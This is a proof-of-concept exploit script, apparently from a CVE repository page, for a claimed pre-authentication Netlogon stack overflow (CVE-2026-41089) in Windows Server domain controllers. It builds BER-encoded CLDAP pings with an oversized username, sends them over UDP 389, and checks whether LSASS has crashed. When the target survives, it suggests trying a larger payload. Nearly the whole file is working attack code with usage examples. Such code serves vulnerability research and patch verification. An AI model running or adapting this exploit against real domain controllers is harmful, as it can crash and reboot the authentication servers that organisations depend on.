# 5465 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / poc.py PY
# DISCLAIMER: This proof-of-concept is provided for educational and authorized
# security research purposes only. The author(s) accept no responsibility or
# liability for any misuse, damage, or loss caused by the use of this code.
# Use at your own risk.
"""
CVE-2026-41089 PoC - Netlogon Stack Buffer Overflow via CLDAP Ping
===================================================================
Sends a CLDAP (Connectionless LDAP over UDP 389) DC locator ping request
with an oversized username to trigger a stack buffer overflow in
netlogon!NetpLogonPutUnicodeString -> netlogon!BuildSamLogonResponse.

The vulnerable code path:
  I_NetLogonLdapLookupEx -> NlGetLocalPingResponse -> LogonRequestHandler
  -> BuildSamLogonResponse -> NetpLogonPutUnicodeString

NlGetLocalPingResponse allocates a 528-byte stack buffer (Src[528]) and
passes it to BuildSamLogonResponse. BuildSamLogonResponse calls
NetpLogonPutUnicodeString multiple times to write Unicode strings into
this buffer without bounds checking.

The root cause: the maximum string length passed to NetpLogonPutUnicodeString
was interpreted as bytes but treated as WCHARs, doubling the effective write.
The "User" field in the CLDAP filter is attacker-controlled (up to 130 wchars).
Combined with server name, domain name, GUIDs, and DNS names, the total write
exceeds 528 bytes and overflows the stack.

Target: Windows Server 2012 through 2025 Domain Controllers (pre-patch)
Impact: LSASS crash -> DC reboot (~60 seconds). RCE possible but not demonstrated.
Attack vector: UDP port 389 (CLDAP), pre-authentication, no credentials needed
CVE: CVE-2026-41089, CVSS 9.8 CRITICAL, CWE-121
Published: May 12, 2026 by Microsoft (found internally)
"""

import argparse
import socket
import struct
import sys
import time


# ---------------------------------------------------------------------------
# BER/DER encoding primitives
# ---------------------------------------------------------------------------

def encode_ber_length(length):
    """Encode a BER length field (X.690 8.1.3).

    Lengths below 0x80 use the short form (one octet holding the length).
    Larger lengths use the definite long form: an initial octet
    ``0x80 | n`` followed by the length as an ``n``-octet big-endian
    integer, with ``n`` as small as possible.

    Args:
        length: Non-negative number of content octets.

    Returns:
        The encoded length octets as ``bytes``.

    Raises:
        ValueError: If ``length`` is negative, or would need more than 126
            length octets (an initial octet of 0xFF is reserved).
    """
    if length < 0:
        raise ValueError(f"Negative length not supported: {length}")
    if length < 0x80:
        return bytes([length])

    # Long form: size the field from the value instead of a fixed ladder,
    # so large lengths are never silently truncated.
    num_octets = (length.bit_length() + 7) // 8
    if num_octets > 126:
        raise ValueError(f"Length too large for BER long form: {length}")
    return bytes([0x80 | num_octets]) + length.to_bytes(num_octets, 'big')


def encode_ber_int(value):
    """Encode a non-negative BER INTEGER (tag 0x02).

    The contents are the minimal big-endian two's-complement form
    (X.690 8.3): as few octets as possible, with a leading 0x00 octet
    only when it is needed to keep the sign bit clear.

    Args:
        value: Non-negative integer to encode.

    Returns:
        Tag, length and content octets as ``bytes``.

    Raises:
        ValueError: If ``value`` is negative.
    """
    if value < 0:
        raise ValueError(f"Negative integers not supported: {value}")

    # One spare bit is reserved for the sign, so a value whose top bit
    # falls on an octet boundary (0x80, 0x8000, ...) gains a 0x00 prefix.
    num_octets = value.bit_length() // 8 + 1
    payload = value.to_bytes(num_octets, 'big')
    return bytes([0x02]) + encode_ber_length(len(payload)) + payload


def encode_ber_enum(value):
    """Encode a non-negative BER ENUMERATED (tag 0x0a).

    The contents use the same minimal big-endian two's-complement form as
    an INTEGER: a leading 0x00 octet appears only when it is needed to
    keep the sign bit clear.

    Args:
        value: Non-negative enumeration value to encode.

    Returns:
        Tag, length and content octets as ``bytes``.

    Raises:
        ValueError: If ``value`` is negative.
    """
    if value < 0:
        raise ValueError(f"Negative enum not supported: {value}")

    # Reserve one bit for the sign so the value can never decode as
    # negative, whatever its magnitude.
    num_octets = value.bit_length() // 8 + 1
    payload = value.to_bytes(num_octets, 'big')
    return bytes([0x0a]) + encode_ber_length(len(payload)) + payload


def encode_ber_string(tag, value):
    """Encode a tagged string value (OCTET STRING, UTF8String, etc.).

    ``str`` input is converted to UTF-8 first; any other value is used
    as the content octets unchanged.
    """
    payload = value.encode('utf-8') if isinstance(value, str) else value
    header = bytes([tag]) + encode_ber_length(len(payload))
    return header + payload


def encode_ber_sequence(tag, contents):
    """Wrap already-encoded contents in a constructed TLV with the given tag."""
    tag_octet = bytes([tag])
    length_octets = encode_ber_length(len(contents))
    return tag_octet + length_octets + contents


# ---------------------------------------------------------------------------
# LDAP filter construction
# ---------------------------------------------------------------------------

def build_equality_filter(attr_name, attr_value):
    """Build an LDAP equalityMatch filter item: (attr=value).

    The attribute name and the assertion value are each emitted as an
    OCTET STRING (tag 0x04) and wrapped under tag 0xA3 (context class,
    constructed, tag number 3). A ``str`` value is UTF-8 encoded; any
    other value is passed through as raw octets.
    """
    attribute_desc = encode_ber_string(0x04, attr_name.encode('utf-8'))
    raw_value = (
        attr_value.encode('utf-8') if isinstance(attr_value, str) else attr_value
    )
    assertion_value = encode_ber_string(0x04, raw_value)
    return encode_ber_sequence(0xA3, attribute_desc + assertion_value)


# ---------------------------------------------------------------------------
# CLDAP DC Locator Ping
# ---------------------------------------------------------------------------

def build_cldap_ping(target_domain, username, ntver=0x00000016):
    """Build a CLDAP DC locator ping (an LDAP SearchRequest sent over UDP).

    The search filter is
    (&(DnsDomain=<domain>)(User=<username>)(NtVer=<ntver>)) and the only
    requested attribute is "Netlogon".

    Per MS-ADTS 6.3.3.2 / RFC 4511 Section 4.5.1.

    Returns the encoded LDAPMessage (messageID 1) as bytes.
    """
    # NtVer is carried as a raw 4-byte little-endian value, not as text.
    ntver_le = struct.pack('<I', ntver)

    # The three equality items are joined under an AND (context tag 0xA0).
    filter_items = b''.join((
        build_equality_filter("DnsDomain", target_domain),
        build_equality_filter("User", username),
        build_equality_filter("NtVer", ntver_le),
    ))

    # SearchRequest members in the order given by RFC 4511 Section 4.5.1.
    search_fields = (
        encode_ber_string(0x04, ""),                # baseObject: empty DN
        encode_ber_enum(0),                         # scope: baseObject
        encode_ber_enum(0),                         # derefAliases: never
        encode_ber_int(0),                          # sizeLimit: no limit
        encode_ber_int(0),                          # timeLimit: no limit
        bytes([0x01, 0x01, 0x00]),                  # typesOnly: FALSE
        encode_ber_sequence(0xA0, filter_items),    # filter
        encode_ber_sequence(0x30, encode_ber_string(0x04, "Netlogon")),
    )

    # SearchRequest is APPLICATION 3 (tag 0x63).
    search_request = encode_ber_sequence(0x63, b''.join(search_fields))

    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp SearchRequest }
    message_id = encode_ber_int(1)
    return encode_ber_sequence(0x30, message_id + search_request)


# ---------------------------------------------------------------------------
# Network I/O
# ---------------------------------------------------------------------------

def send_cldap_ping(target_ip, target_domain, username, port=389, timeout=5):
    """Send one CLDAP ping over UDP and wait for a single reply.

    Args:
        target_ip: Destination address passed to ``sendto``.
        target_domain: Value for the DnsDomain filter item.
        username: Value for the User filter item.
        port: Destination UDP port.
        timeout: Socket timeout in seconds.

    Returns:
        The raw response bytes (at most 4096), or None if the receive
        timed out or a socket error occurred. Socket errors are reported
        on stderr.
    """
    packet = build_cldap_ping(target_domain, username)

    # The context manager closes the socket on every exit path, including
    # when settimeout() itself rejects the timeout value.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.sendto(packet, (target_ip, port))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                # No reply within the timeout is a normal outcome here.
                return None
            return data
        except OSError as e:
            print(f"[-] Socket error: {e}", file=sys.stderr)
            return None


# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------

def main() -> None:
    """Parse command-line arguments and run the three-phase check.

    Phase 1 sends a ping with the short username "testuser" and exits
    with status 1 if nothing comes back. Phase 2 sends a ping whose
    username is "A" repeated ``--length`` times. After sleeping
    ``--delay`` seconds, phase 3 repeats the short ping and reports
    whether a response was received.

    Exits with status 1 for an invalid length or an unanswered phase 1,
    and with status 130 if interrupted during phase 2 or the delay.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-41089 PoC - Netlogon CLDAP stack buffer overflow",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""\
examples:
  %(prog)s 10.0.50.21 corp.local              Normal ping (connectivity test)
  %(prog)s 10.0.50.21 corp.local -l 130       Overflow attempt (default)
  %(prog)s 10.0.50.21 corp.local -l 200       Larger overflow
  %(prog)s 10.0.50.21 corp.local -l 130 -t 10 Longer timeout for slow networks
""",
    )
    parser.add_argument("target_ip", help="IP address of the Domain Controller")
    parser.add_argument("domain_name", help="DNS domain name (e.g. corp.local)")
    parser.add_argument(
        "-l", "--length", type=int, default=130,
        help="Username length in characters (default: 130)",
    )
    parser.add_argument(
        "-t", "--timeout", type=int, default=5,
        help="UDP recv timeout in seconds (default: 5)",
    )
    parser.add_argument(
        "-d", "--delay", type=int, default=3,
        help="Seconds to wait between phase 2 and phase 3 (default: 3)",
    )
    parser.add_argument(
        "-p", "--port", type=int, default=389,
        help="CLDAP port (default: 389)",
    )
    args = parser.parse_args()

    # Only --length is range-checked; --timeout, --delay and --port are
    # used exactly as parsed.
    if args.length < 1:
        print("[-] Username length must be >= 1", file=sys.stderr)
        sys.exit(1)

    username = "A" * args.length

    # Banner summarising the run parameters.
    print("=" * 60)
    print("CVE-2026-41089 - Netlogon Stack Buffer Overflow PoC")
    print("=" * 60)
    print()
    print(f"  Target:   {args.target_ip}:{args.port}")
    print(f"  Domain:   {args.domain_name}")
    print(f"  Username: {args.length} chars ({args.length * 2} bytes as UTF-16)")
    print(f"  Timeout:  {args.timeout}s")
    print()

    # Phase 1: connectivity check
    print("[1/3] Sending normal CLDAP ping (short username)...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        # NOTE(review): this message hard-codes "UDP 389" even though the
        # port is configurable through --port.
        print("[-] No response. DC is not reachable on UDP 389.")
        print("    Verify the target is a domain controller and the port is open.")
        sys.exit(1)
    print(f"[+] DC responded ({len(resp)} bytes). Target is alive.")
    print()

    # Phase 2: send overflow
    print(f"[2/3] Sending overflow payload (username={args.length} chars)...")
    try:
        resp = send_cldap_ping(
            args.target_ip, args.domain_name, username,
            port=args.port, timeout=args.timeout,
        )
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        sys.exit(130)

    # A missing reply here is only reported, not treated as conclusive;
    # phase 3 below performs the follow-up check.
    if resp is None:
        print("[!] No response. LSASS may have crashed.")
    else:
        print(f"[+] Got response ({len(resp)} bytes). Target processed the packet.")

    # Give LSASS time to crash before the liveness check
    print(f"    Waiting {args.delay}s before liveness check...")
    try:
        time.sleep(args.delay)
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        sys.exit(130)
    print()

    # Phase 3: liveness check
    print("[3/3] Liveness check...")
    resp = send_cldap_ping(
        args.target_ip, args.domain_name, "testuser",
        port=args.port, timeout=args.timeout,
    )
    if resp is None:
        print("[!] DC is not responding. LSASS likely crashed. Expect reboot in ~60s.")
    else:
        print(f"[+] DC responded ({len(resp)} bytes). Still alive.")
        # The hint is shown only for lengths below 200 and suggests
        # length + 50, capped at 500.
        if args.length < 200:
            print(f"    Try a larger payload: -l {min(args.length + 50, 500)}")


if __name__ == "__main__":
    main()